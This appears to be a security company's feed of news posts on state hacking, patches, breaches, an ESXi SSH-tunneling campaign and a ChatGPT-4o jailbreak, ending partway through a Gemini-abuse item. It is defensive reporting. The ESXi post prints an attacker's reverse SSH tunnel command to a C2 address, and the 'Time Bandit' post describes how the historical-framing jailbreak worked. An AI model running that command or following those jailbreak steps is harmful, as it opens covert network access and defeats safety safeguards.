• Understanding Sandworm: Cyber Attacks Beyond Borders

    Microsoft has identified a sophisticated cyber espionage operation carried out by a subgroup within Sandworm, the notorious Russian state-sponsored hacking collective. The operation, codenamed BadPilot, has been active since at least 2021, targeting internet-facing infrastructure in over 15 countries. This marks a significant expansion beyond Sandworm’s previous focus on Eastern Europe, with attacks now observed in North America, South America, Asia, and Africa.


    Sandworm’s Expanding Reach

    While Sandworm has historically concentrated on Ukraine, its latest activities indicate a shift in strategy. Microsoft’s findings reveal that high-value targets include government agencies, energy and telecommunications providers, arms manufacturers, and logistics firms. Countries affected by this operation include the United States, Canada, the United Kingdom, Australia, India, China, Turkey, Argentina, and Nigeria.

    The scale of this campaign suggests that Russia is investing heavily in broadening its cyber capabilities, ensuring access to strategic infrastructure across multiple regions. Sandworm’s subgroup appears to be pursuing both opportunistic mass compromises and targeted intrusions, indicating a desire to maintain persistent access across various industries.


    Exploiting Vulnerabilities for Initial Access

    To gain a foothold in target environments, the hacking group exploits publicly known security vulnerabilities in widely used software. Microsoft has identified multiple flaws that have been actively leveraged in these attacks, including vulnerabilities in Microsoft Exchange Server, Fortinet FortiClient, Zimbra Collaboration, and JetBrains TeamCity.

    By taking advantage of unpatched systems, Sandworm secures initial access to corporate and government networks, allowing it to establish long-term persistence. From there, the attackers deploy tools for credential harvesting, privilege escalation, and lateral movement within compromised organizations.


    Maintaining Persistence and Avoiding Detection

    Once inside a network, the attackers use various tactics to ensure prolonged access. Microsoft has observed Sandworm deploying legitimate remote administration tools, such as Atera Agent and Splashtop Remote Services, which allow them to blend in with regular IT activity. Additionally, the group has been seen installing OpenSSH and a custom TOR-based backdoor called ShadowLink, which enables covert access via the TOR anonymity network.

    Another method involves modifying Outlook Web Access (OWA) login pages to inject JavaScript code that captures and exfiltrates credentials in real time. These alterations allow attackers to maintain access even if security teams attempt to lock them out.

    The use of web shells is another persistent tactic. The hacking group has deployed a custom shell known as LocalOlive, which serves as a hidden entry point for follow-up payloads, such as tunneling utilities and malware designed for deeper network penetration.


    Cybercrime as a State-Sponsored Tool

    One of the most concerning aspects of Sandworm’s operations is its increasing reliance on cybercriminal infrastructure. Microsoft and Google’s Threat Intelligence Groups have reported that the group frequently purchases access to compromised systems through underground forums, using tools originally designed for cybercriminals.

    By leveraging malware such as DarkCrystal RAT (DCRat), Warzone, and Rhadamanthys Stealer, Sandworm can rapidly scale its operations without relying solely on in-house tools. The group also utilizes bulletproof hosting services from known cybercriminal actors, allowing them to conduct attacks with minimal risk of attribution.


    Trojanized Software and Fake Windows Updates

    Recent research from cybersecurity firms EclecticIQ and Mandiant has revealed that Sandworm is now using fake software activators and trojanized Windows updates to spread malware. These methods are particularly effective in regions like Ukraine, where the use of pirated software is widespread.

    One example is the Kalambur backdoor, which masquerades as a legitimate Windows security update. Once installed, it enables remote access via the Remote Desktop Protocol (RDP) while routing connections through TOR, making it difficult to track.

    This technique aligns with Sandworm’s broader strategy of targeting industrial control systems (ICS) and critical infrastructure by embedding malware into widely used applications. By exploiting organizations’ reliance on untrusted software, the group gains access to key systems without having to rely on traditional hacking techniques.


    The Bigger Picture: A Shifting Cyber Warfare Landscape

    Microsoft’s report highlights the evolving nature of Russian cyber operations. Sandworm’s shift from regionally focused attacks to a global cyber espionage campaign reflects broader geopolitical ambitions. The group’s ability to combine state-backed hacking with cybercriminal tactics makes it an increasingly dangerous threat.

    With access to a growing number of compromised networks, Sandworm is positioned to conduct espionage, disrupt critical industries, and establish long-term footholds in strategic sectors. These activities are likely aligned with the Kremlin’s long-term geopolitical objectives, giving Russia the ability to engage in cyber warfare on a massive scale.


    How Organizations Can Defend Against Sandworm Attacks

    To mitigate the risk posed by Sandworm and similar state-sponsored threats, organizations must adopt a proactive cybersecurity strategy. Keeping software up to date is critical, as the group primarily exploits known vulnerabilities. Implementing network segmentation can limit attackers’ ability to move laterally within an environment, reducing the impact of a successful breach.

    Security teams should also invest in endpoint detection and response (EDR) solutions to monitor suspicious activity in real time. A zero-trust security model, which continuously verifies users and devices before granting access, can help prevent unauthorized lateral movement.

    Given the increasing sophistication of cyber threats, threat intelligence monitoring is essential. Organizations must stay informed about the latest APT tactics and adjust their defenses accordingly. As cyber warfare continues to evolve, maintaining a strong security posture will be crucial in defending against nation-state actors.


    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

    Questions or concerns? Feel free to reach out to us any time –

    https://www.netizen.net/contact


  • Urgent iOS Update: Fixing Exploited USB Vulnerability

    Apple has released an urgent security patch for iOS and iPadOS, addressing a serious vulnerability that was actively exploited in targeted cyberattacks. The flaw, tracked as CVE-2025-24200, allows an attacker with physical access to a locked iPhone or iPad to disable USB Restricted Mode, a security feature designed to prevent unauthorized data access through the device’s Lightning or USB-C port.

    According to Apple’s security team, the exploit was part of an “extremely sophisticated attack” aimed at specific high-value individuals. While details remain limited, the discovery of the flaw was credited to Bill Marczak of The Citizen Lab, a research group known for investigating spyware and nation-state surveillance operations.


    How the Exploit Works

    USB Restricted Mode, first introduced by Apple to prevent forensic tools from bypassing passcodes and extracting device data, automatically disables USB data connections one hour after a device is locked. This feature effectively renders the Lightning or USB-C port charge-only unless explicitly re-enabled by the user.

    However, the newly disclosed vulnerability bypassed this security mechanism, allowing attackers to re-enable data access without needing the device owner’s passcode. In practice, this means a stolen or seized iPhone could be connected to specialized hardware to extract data—potentially putting sensitive information at risk.

    Apple classified the flaw as an authorization issue in the operating system’s logic and addressed it through improved state management in iOS 18.3.1 and iPadOS 18.3.1.


    Limited Information and High-Risk Targets

    As is common with Apple’s security disclosures, the company has not released indicators of compromise (IOCs) or telemetry data that would allow security researchers and defenders to detect past exploitation. Given Citizen Lab’s involvement, the exploit was likely used in nation-state or law enforcement surveillance campaigns rather than widespread cybercrime.

    The lack of technical details suggests that Apple wants to limit additional exploitation by preventing further reverse engineering of the attack. However, users who are high-risk targets, such as journalists, activists, or government officials, are strongly advised to update their devices immediately to minimize the chance of compromise.


    Mitigation and Next Steps

    To protect against CVE-2025-24200, Apple users should:

    • Update to iOS 18.3.1 or iPadOS 18.3.1 as soon as possible.
    • Ensure USB Restricted Mode is enabled under Settings > Face ID & Passcode > “USB Accessories” (should remain toggled off).
    • Use a strong passcode to prevent unauthorized access if a device is physically stolen.
    • Enable Lockdown Mode for extra security if you suspect you are a high-risk target.

    As physical access attacks remain a concern for high-profile individuals, ensuring that security measures like USB Restricted Mode, encrypted backups, and remote wipe capabilities are properly configured remains crucial.

    While no reports suggest widespread exploitation, this latest attack highlights the importance of keeping devices updated and staying aware of emerging threats targeting mobile security.


    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

    Questions or concerns? Feel free to reach out to us any time –

    https://www.netizen.net/contact


  • Time Bandit: A Security Bypass Vulnerability in ChatGPT-4o

    A newly disclosed security bypass vulnerability in OpenAI’s ChatGPT-4o, dubbed “Time Bandit,” allowed attackers to circumvent the platform’s built-in safety guardrails and generate illicit or dangerous content. By manipulating ChatGPT’s perception of time and leveraging historical context, malicious actors could instruct the AI to provide restricted information. This vulnerability, discovered by cybersecurity and AI researcher David Kuszmar, could have been exploited at scale by threat actors to generate harmful content such as weapon manufacturing instructions, drug synthesis guides, or phishing campaigns. Kuszmar, also credited for the Inception, 1899, Severance, and Kyber exploits, identified this flaw after conducting independent testing and recognizing the risks posed by the temporal confusion that ChatGPT experienced, which allowed him to bypass its safeguards.


    Understanding the Time Bandit Exploit

    The Time Bandit jailbreak takes advantage of timeline confusion and procedural ambiguity within ChatGPT-4o. The attack relies on guiding the AI into responding as if it were operating within a specific historical period, tricking it into ignoring modern-day safety protocols.

    There are two primary methods by which this exploit could be executed:

    1. Direct Prompt Manipulation
      • The attacker initiates a conversation with ChatGPT by asking about a specific historical time period or event.
      • The attacker progressively guides ChatGPT through procedural questions that maintain the historical context.
      • By keeping the AI within this historical setting, the attacker can pivot the conversation toward restricted topics.
      • ChatGPT, failing to recognize the shift due to the established historical frame, bypasses its safety filters and generates content it would typically block.
    2. Search Function Exploitation
      • The attacker prompts ChatGPT to search the web for a specific historical event or topic.
      • Subsequent queries continue within the established historical timeline while progressively shifting towards restricted topics.
      • By maintaining the time-bound narrative, the attacker tricks ChatGPT into providing information that would usually trigger content restrictions.

    During independent testing, security researchers at CERT/CC replicated the jailbreak and found that while ChatGPT would recognize and remove policy-violating prompts, it would still proceed to answer them. Notably, the exploit was more successful when using time frames from the 1800s and 1900s.


    Potential Impact of Time Bandit

    The Time Bandit vulnerability represented a significant security risk, as it effectively allowed ChatGPT-4o to be misused as a tool for generating harmful content at scale. Potential consequences included:

    • Weaponization of AI: Attackers could generate instructions on illicit activities, such as weapon or drug manufacturing.
    • Phishing and Social Engineering: ChatGPT could be exploited to generate convincing phishing emails, deepfake content, or fraudulent messages.
    • Malware Development: Hackers could manipulate ChatGPT into providing coding assistance for creating malicious scripts or exploits.
    • Bypassing OpenAI’s Security Filters: The ability to use ChatGPT as a proxy for malicious activity made tracking and attribution significantly more challenging.

    OpenAI’s Response and Mitigation

    OpenAI has since patched the vulnerability and reinforced ChatGPT-4o’s ability to detect and prevent similar jailbreaks. In response to the disclosure, an OpenAI spokesperson stated:

    “It is very important to us that we develop our models safely. We don’t want our models to be used for malicious purposes. We appreciate you for disclosing your findings. We’re constantly working to make our models safer and more robust against exploits, including jailbreaks, while also maintaining the models’ usefulness and task performance.”

    While Time Bandit has been mitigated, this exploit highlights the ongoing challenges in securing AI models against adversarial manipulation. Attackers will likely continue to develop new jailbreak techniques, emphasizing the need for continuous monitoring, ethical red-teaming, and improved security frameworks in AI development.


    Lessons Learned and Future Considerations

    The discovery of Time Bandit underscores the broader risks of AI safety and security:

    1. AI Jailbreaks Are Inevitable: Attackers will continue to develop novel methods to trick AI models into bypassing safety protocols through prompt engineering and contextual manipulation.
    2. History-Based Exploits Work: OpenAI and other AI providers must develop safeguards that recognize time-based deception techniques, ensuring the AI maintains modern ethical and legal standards regardless of conversational framing.
    3. Search Function Risks: AI models with real-time search capabilities introduce additional security risks, as attackers can use external data sources to strengthen jailbreak attempts.
    4. Security Audits Are Critical: Routine AI red-teaming and independent audits should be conducted to identify new vulnerabilities before they can be exploited at scale.

    As AI continues to evolve, so will adversarial tactics. Addressing vulnerabilities like Time Bandit is crucial to ensuring that AI remains a safe and responsible tool rather than a potential liability.


    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

    Questions or concerns? Feel free to reach out to us any time –

    https://www.netizen.net/contact


  • February 2025 Patch Tuesday: Microsoft Fixes 4 Zero-Days, Including 2 Under Active Exploitation

    Microsoft’s February 2025 Patch Tuesday addresses a total of 55 vulnerabilities, including four zero-day flaws, with two actively exploited in attacks. This month’s update also fixes three critical vulnerabilities, all classified as remote code execution (RCE) flaws.


    Breakdown of Vulnerabilities

    The vulnerabilities addressed this month include:

    • 19 Elevation of Privilege (EoP) vulnerabilities
    • 2 Security Feature Bypass vulnerabilities
    • 22 Remote Code Execution (RCE) vulnerabilities
    • 1 Information Disclosure vulnerability
    • 9 Denial of Service (DoS) vulnerabilities
    • 3 Spoofing vulnerabilities

    These totals exclude one critical Microsoft Dynamics 365 Sales elevation of privilege flaw and ten Microsoft Edge vulnerabilities that were patched on February 6. For non-security updates, see the Windows 11 KB5051987 & KB5051989 cumulative updates and the Windows 10 KB5051974 update.


    Zero-Day Vulnerabilities

    This month’s Patch Tuesday resolves four zero-day vulnerabilities, with two actively exploited and two publicly disclosed:

    Actively Exploited Zero-Days

    CVE-2025-21391 | Windows Storage Elevation of Privilege Vulnerability

    Affects: Windows Storage
    This vulnerability allows attackers to delete targeted files on a system. While it does not expose confidential data, it could be used to disrupt services by deleting critical files. Microsoft has not disclosed details about how this vulnerability was exploited in the wild.

    CVE-2025-21418 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability

    Affects: Windows Ancillary Function Driver for WinSock
    This vulnerability enables attackers to escalate privileges to SYSTEM level. Microsoft has not shared details on how it has been exploited but confirms that it was disclosed anonymously.

    Publicly Disclosed Zero-Days

    CVE-2025-21194 | Microsoft Surface Security Feature Bypass Vulnerability

    Affects: Microsoft Surface and Hypervisor Products
    This hypervisor vulnerability allows attackers to bypass UEFI protections, compromising the secure kernel. Discovered by Francisco Falcón and Iván Arce of Quarkslab, this flaw is likely linked to the PixieFail vulnerabilities affecting the IPv6 network protocol stack in Tianocore’s EDK II, which is used in Microsoft Surface and hypervisor products.

    CVE-2025-21377 | NTLM Hash Disclosure Spoofing Vulnerability

    Affects: Windows NTLM Authentication
    This vulnerability exposes NTLM hashes when a user interacts with a malicious file. Simply selecting or right-clicking a file could trigger a remote connection, allowing an attacker to capture NTLM hashes for cracking or pass-the-hash attacks. It was discovered by Owen Cheung, Ivan Sheung, and Vincent Yau (Cathay Pacific), Yorick Koster (Securify B.V.), and Blaz Satler (0patch by ACROS Security).


    Vendor Updates

    Adobe: Released security updates for Photoshop, Substance3D, Illustrator, and Animate.
    AMD: Issued firmware updates to mitigate a vulnerability allowing malicious CPU microcode injection.
    Apple: Fixed a zero-day vulnerability exploited in sophisticated attacks.
    Cisco: Patched security flaws in Cisco IOS, ISE, NX-OS, and Identity Services.
    Google: Fixed an actively exploited zero-day in Android Kernel’s USB Video Class driver.


    Recommendations for Users and Administrators

    Organizations should apply the February 2025 Patch Tuesday updates as soon as possible, with priority given to the actively exploited zero-days and critical RCE vulnerabilities. Keeping systems updated is crucial to reducing exposure to potential attacks. For detailed guidance, refer to Microsoft’s official security bulletins or consult IT security teams.


    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 


  • Netizen: Monday Security Brief (2/10/2024)

    Today’s Topics:

    • Massive Brute Force Attack Targets VPN Devices Using 2.8 Million IPs
    • Hospital Sisters Health System Data Breach Exposes Personal Information of 883,000 Individuals
    • How can Netizen help?

    Massive Brute Force Attack Targets VPN Devices Using 2.8 Million IPs

    A widespread brute force attack has been detected, involving nearly 2.8 million unique IP addresses in an attempt to compromise credentials for networking devices, including those from well-known vendors like Palo Alto Networks, Ivanti, and SonicWall.

    Brute force attacks occur when attackers try multiple username and password combinations until they find the correct one. Once successful, the attacker gains unauthorized access to the device or network, potentially leading to serious security breaches.

    According to The Shadowserver Foundation, a threat intelligence platform, this attack has been ongoing since last month. It has escalated significantly, with the attackers leveraging around 2.8 million distinct IP addresses every day. A majority of these addresses (1.1 million) originate from Brazil, with other notable sources including Turkey, Russia, Argentina, Morocco, and Mexico. However, the attacks have a global reach, with many countries contributing to the effort.

    The devices targeted are primarily edge security devices, such as firewalls, VPNs, and gateways, which are often exposed to the internet to allow remote access. The attackers are using compromised devices, including MikroTik, Huawei, Cisco, Boa, and ZTE routers, as well as IoT devices. These devices are commonly hijacked by large malware botnets.

    The Shadowserver Foundation confirmed that the attack has been progressing for some time but has recently grown in scale. The attacking IP addresses are distributed across various networks and Autonomous Systems, indicating that the operation is likely backed by a botnet or a group utilizing residential proxy networks.

    Residential proxies are IP addresses assigned by Internet Service Providers (ISPs) to regular consumer customers. These proxies are increasingly used in cybercrime operations, including data scraping, bypassing geo-restrictions, ad verification, and ticket scalping. Since residential proxies route traffic through home networks, they appear to be legitimate users, making it more difficult to detect malicious activity.

    Devices targeted in this attack, such as gateways, could potentially serve as proxy exit nodes for cybercriminals. These nodes are highly valued because they use the trusted reputation of enterprise networks, making malicious traffic harder to identify and block.

    To protect edge devices from these types of brute force attacks, experts recommend several steps. Changing the default admin password to a strong, unique one is crucial. Enforcing multi-factor authentication (MFA), using an allowlist of trusted IPs, and disabling unnecessary web admin interfaces can also help prevent unauthorized access. Regularly updating device firmware and applying security patches is essential to close vulnerabilities that attackers might exploit.

    In related incidents, last April, Cisco warned of a similar brute force campaign targeting a variety of devices from Cisco, CheckPoint, Fortinet, SonicWall, and Ubiquiti. In December, Citrix issued a warning about password spray attacks targeting Citrix Netscaler devices worldwide.


    Hospital Sisters Health System Data Breach Exposes Personal Information of 883,000 Individuals

    A significant cyberattack in August 2023 severely disrupted operations at Hospital Sisters Health System (HSHS), compromising the personal data of approximately 883,000 individuals.

    The breach, which began on August 27, 2023, led to widespread outages that affected internal systems, communication platforms, phone lines, applications, and the hospital’s website, as well as the MyChart and MyPrevea services. The disruption lasted several days, forcing all 15 HSHS hospitals in Wisconsin and Illinois, alongside Prevea Health clinics, to implement emergency downtime protocols. Despite the technical issues, patient care continued without interruption.

    An investigation into the attack revealed that hackers gained access to the healthcare system’s network from August 16 to August 27, during which they accessed sensitive files containing personal data. The potentially compromised information includes names, addresses, dates of birth, Social Security numbers, driver’s license numbers, medical record numbers, treatment details, and health insurance information.

    While HSHS began notifying affected individuals in October 2023, it wasn’t until August 2024, a full year after the breach, that the healthcare provider was able to confirm the scale of the incident. In September 2024, HSHS issued an open letter acknowledging that some affected patients had been targeted in fraud schemes by individuals posing as HSHS representatives.

    This week, HSHS notified the Maine Attorney General’s Office that the breach had impacted 882,782 people. In response, HSHS is offering free identity theft protection and credit monitoring services to those affected by the breach.


    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 


  • CISA and FDA Warn of Security Risks in Contec Patient Monitors

    The Cybersecurity and Infrastructure Security Agency (CISA) and the U.S. Food and Drug Administration (FDA) have issued urgent warnings about serious security vulnerabilities in Contec CMS8000 patient monitors. These flaws could allow remote attackers to gain unauthorized access, manipulate device settings, and exfiltrate sensitive patient data. As a result, healthcare providers are strongly advised to disconnect affected devices from the internet and remove them from their networks to prevent potential exploitation.


    Critical Backdoor Discovered in Contec CMS8000 Monitors

    Manufactured by the Chinese company Contec Medical Systems, the CMS8000 patient monitors are widely used in healthcare facilities across the U.S. and Europe to track vital signs such as heart rate, oxygen levels, and blood pressure. However, CISA has uncovered a backdoor in the device’s firmware that enables remote file uploads and system modifications, bypassing standard network security controls.

    According to a newly released CISA fact sheet, the backdoor establishes automated connections to a hardcoded IP address linked to an external third-party university, rather than a legitimate medical organization. This security flaw, tracked as CVE-2025-0626, has been assigned a CVSS severity score of 7.7, indicating a high risk of remote code execution and system compromise.


    Data Exposure and Information Leakage

    In addition to the backdoor, security researchers have identified CVE-2025-0683, an information exposure vulnerability rated 5.9 on the CVSS scale. This flaw allows the CMS8000 monitor to transmit patient data in plaintext over the internet to a hardcoded IP address. Attackers could intercept this unencrypted information through a man-in-the-middle (MitM) attack, leading to serious privacy breaches affecting personally identifiable information (PII) and protected health information (PHI).

    Further investigation has revealed CVE-2024-12248, an out-of-bounds write vulnerability with a severity rating of 9.3, that could enable attackers to send malicious payloads, overwrite critical system files, and execute arbitrary commands remotely. This exploit poses a direct risk to patient safety, as compromised monitors could display inaccurate readings, potentially leading to misdiagnoses or delayed medical interventions.


    No Available Patch – Immediate Action Required

    Currently, there are no software patches available to fix these vulnerabilities, leaving affected devices exposed to potential cyberattacks. The FDA and CISA have recommended that all healthcare providers take the following immediate actions:

    • Disconnect vulnerable devices from the internet. If remote monitoring features are not essential, unplug the Ethernet cable and disable wireless connectivity (WiFi or cellular).
    • Verify device firmware versions. If the monitor is running an affected firmware iteration, assume it is compromised.
    • Assess potential network compromise. Any system that has been connected to a vulnerable device may require further security reviews.
    • Replace or remove affected monitors. Since no patch is available, healthcare organizations should consider replacing Contec CMS8000 and rebranded models like the Epsimed MN-120 with secure alternatives.

    Prior Security Concerns with Contec Monitors

    This is not the first time Contec’s patient monitoring systems have raised cybersecurity concerns. In 2022, CISA identified five additional vulnerabilities in the same firmware, including issues that allowed attackers to:

    • Modify device firmware with physical access
    • Gain root shell access
    • Use hardcoded credentials to alter device configurations
    • Trigger denial-of-service (DoS) conditions

    Despite these prior warnings, Contec has not provided security updates to address these risks, increasing the urgency for healthcare providers to take precautionary measures.


    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 


  • Ransomware Actors Exploit SSH Tunneling for VMware ESXi Access: What SOC Teams Need to Know

    Ransomware gangs targeting VMware ESXi bare metal hypervisors are using SSH tunneling to maintain persistence and evade detection within corporate networks. Here’s what you need to know:


    ESXi: A High-Value Target

    VMware ESXi hypervisors play a critical role in virtualized environments, hosting multiple virtual machines (VMs) on a single physical server. These appliances are often under-monitored, making them a prime target for attackers aiming to steal data, deploy ransomware, and render entire infrastructures inoperable by encrypting VMs.


    Entry Points and Exploitation

    According to cybersecurity firm Sygnia, attackers gain access by exploiting known vulnerabilities or using stolen administrator credentials. Once access is obtained, ransomware actors use ESXi’s built-in SSH service to set up covert connections, establish persistence, and move laterally within the network.


    Leveraging SSH for Stealthy Persistence

    The SSH service in ESXi allows administrators to remotely manage the hypervisor, but attackers abuse this feature for malicious purposes. Using SSH, they can establish reverse port-forwarding tunnels to their command-and-control (C2) servers with a single command:

    phpCopyEditssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>  
    

    Since ESXi appliances are rarely rebooted, these tunnels act as semi-persistent backdoors, enabling attackers to operate undetected over extended periods.


    Logging Challenges on ESXi

    Monitoring ESXi activity is complicated by its fragmented logging system. Unlike traditional systems with consolidated logs, ESXi disperses logs across multiple files, creating visibility gaps that attackers exploit. Key logs to monitor for SSH activity include:

    • /var/log/shell.log: Tracks commands executed in the ESXi shell.
    • /var/log/hostd.log: Logs administrative actions and user authentication.
    • /var/log/auth.log: Captures login attempts and authentication events.
    • /var/log/vobd.log: Stores system and security event data.

    Additionally, attackers may modify or delete logs to obscure evidence of their presence, complicating forensic investigations.


    What SOC Teams Need to Know

    To effectively address the evolving threat landscape targeting VMware ESXi hypervisors, Security Operations Center (SOC) teams must prioritize proactive monitoring and response strategies. Below are key focus areas for SOC teams to enhance their defenses and mitigate risks associated with SSH tunneling and ransomware activity:

    1. Prioritize ESXi Logging and Monitoring

    • Centralize Logs: Integrate ESXi logs into a centralized Security Information and Event Management (SIEM) system to detect anomalies and improve visibility across the infrastructure.
    • Monitor Key Log Files: Regularly review critical ESXi logs such as shell.log, auth.log, hostd.log, and vobd.log for unusual activity, including unauthorized SSH connections and firewall modifications.
    • Detect Log Tampering: Look for gaps, missing logs, or unusual timestamps that could indicate attacker attempts to cover their tracks.

    2. Enhance SSH Security

    • Restrict SSH Access: Limit SSH usage to authorized personnel and trusted IP addresses. Configure firewalls to block unauthorized connections and disable SSH access when not in active use.
    • Implement Multi-Factor Authentication (MFA): Strengthen SSH authentication with MFA to prevent unauthorized access even if credentials are compromised.
    • Audit SSH Activity: Monitor for abnormal SSH usage patterns, such as frequent remote connections or high-volume data transfers.

    3. Hardening ESXi Configurations

    • Apply Regular Updates: Ensure ESXi systems are up to date with the latest patches and security updates to address known vulnerabilities.
    • Enforce Least Privilege: Limit administrative permissions to only those necessary for specific tasks, reducing the risk of credential abuse.
    • Review Firewall Rules: Regularly audit and harden firewall configurations to block unauthorized access and close unused ports.

    4. Threat Hunting and Anomaly Detection

    • Identify Indicators of Compromise (IOCs): Train SOC analysts to recognize IOCs associated with SSH tunneling and ransomware campaigns, such as new or unknown SSH keys and unusual remote port-forwarding activity.
    • Establish Baselines: Understand normal traffic patterns in your environment to more effectively identify anomalies.
    • Conduct Proactive Threat Hunts: Leverage threat intelligence and hunt for signs of compromise across all ESXi systems, focusing on both live traffic and historical logs.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 


  • Netizen: Monday Security Brief (2/3/2024)

    Today’s Topics:

    • Google Reports State-Sponsored Hackers Abusing Gemini AI for Cyber Operations
    • Texas Bans DeepSeek and RedNote from Government Devices Over Security Concerns
    • How can Netizen help?

    Google Reports State-Sponsored Hackers Abusing Gemini AI for Cyber Operations

    Google has revealed that state-backed hacking groups are increasingly experimenting with its AI-powered Gemini assistant to enhance their cyber capabilities. According to Google’s Threat Intelligence Group (GTIG), these advanced persistent threat (APT) actors primarily use Gemini for productivity purposes, rather than for creating or executing AI-driven cyberattacks.

    While AI tools have yet to revolutionize cyberattacks, threat actors are leveraging them to speed up various stages of their operations, including reconnaissance, research, and scripting. Google has identified activity linked to APT groups from over 20 countries, with particularly high usage from actors associated with Iran and China.

    Google’s report outlines how state-sponsored hacking groups, including those from Iran, China, North Korea, and Russia, have been experimenting with Gemini to improve their operational efficiency. Their activities include:

    • Iranian APTs: The most active users of Gemini, Iranian hackers have used it for reconnaissance on defense organizations and experts, researching publicly known vulnerabilities, crafting phishing campaigns, and generating content for influence operations. They have also sought translations and technical explanations related to cybersecurity and military technologies, such as unmanned aerial vehicles (UAVs) and missile defense systems.
    • Chinese APTs: These groups have focused on reconnaissance targeting U.S. military and government organizations, researching vulnerabilities, scripting for lateral movement and privilege escalation, and evasion techniques for post-compromise persistence. Additionally, they have attempted to access Microsoft Exchange using password hashes and reverse-engineer security tools like Carbon Black EDR.
    • North Korean APTs: Their use of Gemini has supported multiple attack phases, including identifying free hosting providers for infrastructure, conducting reconnaissance on target organizations, and developing malware with enhanced evasion techniques. North Korean hackers have also exploited Gemini to draft job applications and cover letters as part of efforts to infiltrate Western companies under false identities.
